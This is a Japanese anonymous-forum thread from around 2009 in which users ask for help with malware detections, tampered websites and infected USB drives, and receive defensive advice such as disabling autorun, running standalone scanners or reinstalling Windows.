有名な鯖ブラウザだろw

すいません、なんちゃってﾈｯﾄﾜｰｸ管理者です。
社内のﾊﾟｿｺﾝでｳｨﾙｽが発生しました。

【使用セキュリティソフトとバージョン】「ｳｨﾙｽﾊﾞｽﾀｰ2007、2008、2009」
【Microsoft Update（MU）の状態】　「今年の4月までの状態でした」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】「Yes」

ｳｨﾙｽﾊﾞｽﾀｰが「BKDR_SDBOT.CU」を検出、隔離したとﾒｯｾｰｼﾞが出ていて、ｳｨﾙｽが感染
していたであろうUSBﾒﾓﾘも検索し隔離、その後ﾌｫｰﾏｯﾄもしたのですが、違うPCで
利用したところ、そのPCのｳｨﾙｽﾊﾞｽﾀｰもUSBﾒﾓﾘにｳｨﾙｽが存在しているというﾒｯｾｰｼﾞを
出してしまいました。

どうしたら完全に削除することができるのでしょうか。

そのUSBメモリ捨てて新しいの買えよ

>>929
autorunを切れ

http://www.itmedia.co.jp/enterprise/articles/0902/26/news029.html
http://support.microsoft.com/kb/967715/ja

最近GENOｳｨﾙｽの存在を知り、感染しているか心配です。

ＯＳはVISTAを使っていて、まとめサイトではVISTAは大丈夫と記載はありますが、、、

VISTA感染の報告などあるのでしょうか？

スクリプトでNT5(2000、XP、2003)以外を蹴ってるが、
わざわざスクリプト解読してpdfやswfやexeを拾って実行すりゃ感染するんじゃね?

小林製薬の一部サイトが改ざん、閲覧者はウイルス感染の恐れ
http://internet.watch.impress.co.jp/cda/news/2009/05/14/23435.html

AVGで次のメッセージが出ました。
「Adware.CnsMinが検出されました」
どうすれば良いのでしょうか？

AVG Anti-Virus Version 86
http://pc11.2ch.net/test/read.cgi/sec/1240905473/

携帯電話からサイトを観覧した場合でも、やっぱり感染してしまうんでしょうか？

>>937
観覧ねwww

>>938
陛下に対してなんという口のききかた…

データを移すとき、ＵＳＢメモリや外付けＨＤＤなどで
ウィルスに感染するそうですね。
では、ＤＶＤ−Ｒを使ってデータを移しても、
やっぱり感染のリスクはあるのでしょうか？

【使用OS】　「vista home premium sp1」
【Microsoft Update（MU）の状態】　「自動更新」
【使用セキュリティソフトとバージョン】　「カスペルスキー2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「常に最新」
【スパイウェア対策ソフト】　 「カスペルスキー2009しか入れていません」
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「常に最新」
【ルータの有無】　「有」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「HEUR:Trojan-Downloader.Script.Generic
Windows Sidebar＼Shared Gadgets＼eBooks World.gadget＼filpBook.js」
（半角が見当たらないので全角になってしまいました。すみません）

ウイルスに分類されており、駆除出来なかったのでファイルごと削除して再起動かけました
このウイルスについてググったところ海外サイトばかりひっかかり、
詳細が分からないので教えて下さい

サーバーのファイルに作った覚えのない
「hili2.php」ってのが作られてhtmlも改ざんされてるんだけど
詳細わかる人います？

「hifili2.php」だった

>>942
ttp://www29.atwiki.jp/geno/pages/15.html

hj-splitという動画ファイルを結合させるソフトをいつものように立ち上げましたところ
このようなメッセージが出まして立ち上がりませんでした。
the procedure entry point ioctlsocket could not be located in the dynamic link library wsock32.dll
ウィルスなのでしょうか？対策方法などわかりましたら、ご指導ください。

192.***.***.255はブロードキャストアドレスですよね？(192.***.***.1がルータのアドレス)
セキュリティソフトが接続先192.***.***.255、UDPポート138の通信を許可するのか聞いてきますが、
許可で問題ありませんよね？

SMVERI32.dll っていうウイルスなのかよく分からないものに感染した。。
SMCORPNAME Corporation　
って書いてあるが中国？のやつかもしれないが
このファイルがwuaulctやrundll32を頻繁に起動させて困っています
どなたかご存知の方がいらっしゃいましたら
対処法を教えてください
お願いします

なんで質問テンプレすら使えない奴ばっかりなんだろう。

質問用テンプレが回答者に一方的に都合が良くて質問者向けで無いからだろう
質問用テンプレを自分で全部埋められる人がここで聞く事なんか無いだろうさ

>>948
読んでない説に一票
見つけたウィルスが怖くてあっぱっぱー状態なんだろう。
でも、だからこそ　>>１読んで出直し！　と突っぱねるべきかと。

記載例は必要だぞ。

>>950
いやテンプレがあるのは知ってたが
原因が分かってるから駆除方法を知ってる人がいれば教えて欲しいんです
ググっても英語サイトが引っ掛かるだけで対処法も詳しくはのってないので

開き直りか
もう回答は無いと思え

>>952の言い分は
ちょっと過失で事故って車壊しちゃったんだけど、
状況とか詳しく説明もせずに、周りから援助もらったり修理用の保険金下りたりします？
てことだよな？

原因分かってるのならご自身で対処できると思いますが…？

★質問用テンプレ★
【使用OS】　「Windows Vista」
【Microsoft Update（MU）の状態】　「最新です」
【使用セキュリティソフトとバージョン】　「ノートンインターネットセキュリティ2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「はい」
【スパイウェア対策ソフト】　「ありません」
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「ありません」
【ルータの有無】　「あります」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】

リカバリをした後Janeをダウンロードしようと思って
http://janesoft.net/janestyle/（Jane公式サイトです）へアクセスし、
ZIP版をダウンロードしたらノートンがトロイのウイルス警告を出しました、詳細は
http://safeweb.norton.com/report/show?url=ftp.vector.co.jpです。
ZIP版をダウンロードはしたのですが、解凍はしていないのと、ノートンで
フルスキャンをしても何も検出されませんでした。

警告を出されただけで、解凍していない＆スキャンで何も検出されなかったら
問題は無いでしょうか？

よろしくお願いします。

Nortonスレで聞けよ

【使用OS】Windows Vista SP1
【Microsoft Update（MU）の状態】最新の状態
【使用セキュリティソフトとバージョン】ウイルスキラーゼロ(2009年版に更新済み)
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】はい
【スパイウェア対策ソフト】同上
【スパイウェア対策ソフトの更新は定期的に行なっているか】はい
【ルータの有無】無し

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】

Backdoor.Win32.VB.epoという名前のウイルスが起動後に数分おきに常に駆除されています。
完全にウイルススキャンを行っても感染ファイルは発見されず、安全性のチェックをしても高いままです。
どうやら駆除しきれていないようなので、このままパソコンを使い続けるのは危険なように感じます。
完全に駆除するにはどうしたらよいのでしょうか？
よろしくお願いします。

>>958
クリンインスコしる

>>959
繰り返し質問ですみません。
クリーンインストールって、Vistaを再インストールするってことですか？

それとBackdoor.Win32.VB.epoはどんな悪影響を及ぼすウイルスなのでしょうか？
ググってみてもまともな解説のあるサイトをほとんど発見できなかったのですが…。

>>960
カスペのオンラインで駆除出来ると思うが万全を期すんだったら再インストール

>>960
だーかーらー
ウジウジ悩むくらいなら綺麗さっぱり消しちまえ
ついでにうぃるすきらぁも投げ捨てて別なワクチンを導入しろ
間違ってもキングとかセキュリティZEROみたいなジョークソフトを入れるなよ

>>960
キラーのスレでも同じようなこと言ってる人いたからキラーの問題じゃないか？

>>961-962
ありがとうございます。
まずはカスペにアクセスして駆除を試してみます。
駄目なら大事なデータを避難して再インストールします。
>>963
多分それは私だと思います。レスがつかなかったのでスレチかと思って…。
結果的にはマルチになってしまいましたね、すみません…。

まさかシステムの復元のバックアップフォルダってオチじゃないよな

C:\Documents and Settings\(ユーザー名)の中に「CHIAKO」というフォルダが出来ていました。
フォルダの中には「新しいフォルダ(8)」が入っていて、その中には何もありませんでした
プロパティで確認したところ0メガバイトでした。
自分家族はもちろんのこと知人にもCHIKAKOという名の人はいないのですが
勝手にこんなフォルダを作成するウイルスってあるのでしょうか?

>>966
誰かがその名前でPC使ったんじゃね？

【使用OS】　「vista」
【Microsoft Update（MU）の状態】　「最新」
【使用セキュリティソフトとバージョン】　「avast! 4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「最新」
【スパイウェア対策ソフト】　「spybotとブラスター」
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「はい」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「場所：C:\ProgramData\Skype\Plugins\_sstore.dat
ウィルス名：SVL 1.X (Slovakia)


スカイプはいつもオンにしていて特に変わった作業をしたわけではありませんが、
いきなりavast!の警告が出ました。
avast!のスキャンを実行していたわけでもありません。
このウィルス警告が出たので、avastの警告画面の削除ボタンを押しました。
このウィルスは何ですか？なに経由できたんでしょうか？」

maruti

昨日、中国の動画サイトで映画ナルト疾風伝・絆があったのでダウンロードしたのですが
ダウンロード終わったとほぼ同時に、いきなり強制終了したかのように確認ウィンドウもなしに電源が切れ、
すぐに電源ボタン押しても全く反応せず、
数分後に再び電源ボタン押すと数秒だけ起動しただけで、またシャットダウンしました
今も起動出来ません

この症状を質問スレで書いて聞いてみたら
「おそらく出力が安定していない。電源ユニットが逝ったと思われる。交換しよう」と、回答が返ってきたのですが
ウィルスでこのような症状に陥ることはないのでしょうか？

これも自業自得ですね。

1．電源入れてからどの辺りまで正常に起動できるか
2．セーフモードでの起動も試してみたか

>>971
レスありがとうございます
PCの起動ボタンを押すと反応するときとしないときがあります。
反応したときはDELLのロゴが出てくるところまで行くこともありますが、行かないこともあります。
ロゴまで行ってもそれ以上進むことはなく、ロゴが表示してる間にF8ボタンを押すと一度だけ進み、
通常起動する（うろ覚え）を選び、何もなかったかのように起動してデスクトップまで行きましたが
ウィルスバスター2009でフルスキャンをかけている途中で突然強制終了しました。

まだセーフモードで起動は試みてませんが、次いけそうであればやってみます。

それと次起動できたときはスキャンよりシステムの復元を試したほうがよいでしょうか？

>972
PCに繋がっている周辺機器（マウス・キーボード以外）を外しても同じことになりますか？

システムの復元はイチかバチかの賭け
上手く行けば良いけど…

>>973
もう夜も遅いので、また明日やってみることにします

ネットで調べてみましたが
どうやらBlasterというウィルスみたいですね

Blasterワームとは違いますね…
もしBlasterなら再起動という症状ですし。

>>968わかる方いませんか？

>>977
>>968がMulti-postだとわかりました！

>>978
マルチポストじゃないですが・・

トロイの木馬スレでも質問しましたが
心配なのでこちらでも聞かせてもらいます。
特徴が、

・1時間ぐらいごとにインターネットが強制終了される。
・今まで使っていたトレンド社のウイルススキャンが使えない
・さらに、他何社かのウイルススキャンも試してみたが、
『ネットワークに接続してください』などと出て、
ウイルスキャン自体が使えない。

他にもあると思うんですがいま分かっているのは
これだけです。
インターネットは利用でき、他は問題なく使えますが
こんなことは初めてなのでどうしたらいいかも、
知識もまったくありません。
ファイルスキャンという物も試そうと思ってみましたが、
どこに潜んでいるのかも分からず完全に手詰まりです。
どなたか解決方法、解決までの手順などを教えてください。

【使用OS】　「windows xp」
【Microsoft Update（MU）の状態】　「最新」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】
【使用セキュリティソフトとバージョン】　「体験版をインストールしていたが、使用期限が切れている」
【ルータの有無】　「有」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「不明(スキャン不可)」

スレ違いでしたらご指摘下さい。
よろしくお願いします。

クリーンインストール

>>980
ttp://drweb.jp/support/cureit.html
ttp://avptool.virusinfo.info/en/index.htm
ttp://www.norman.com/support/support_tools/58732/en
スタンドアロン型のアンチウイルス。
他のPCでダウンロードして、CDかUSBメモリで移して使ってみたら？

＞使用期限が切れている
論外。

>>980
ウイルスじゃなくてマルウエアが入ってて、セキュリティベンダーへのアクセスを阻害されてるんだと思う。たぶんHOST情報も書き換えられてる予感。
まずクリーンインストールし、Windows Updateを実施。
それからフリーでもいいからアンチウイルスソフトとアンチスパイウエア（マルウエア）ソフトを必ずインストールし、毎日Updateする癖をつけたほうが良い。スキャンも。
ウイルスやマルウエアを撒き散らすPCでメール送受信するのは大迷惑だ。
もしサイト持ちなら、そんなセキュリティ認識が無い管理人のサイトは勘弁して欲しいし、二度とサイトに行かない。

aviraもしくはavastでウイルス対策。
SUPERAntispyware、windows defenderでマルウエア対策。
PC初心者なら通産省で配布しているCCCクリーナーも数日に一度Updateされているので、そちらでのスキャンを試してみるもの良いと思う。
それにもアクセスできないかな？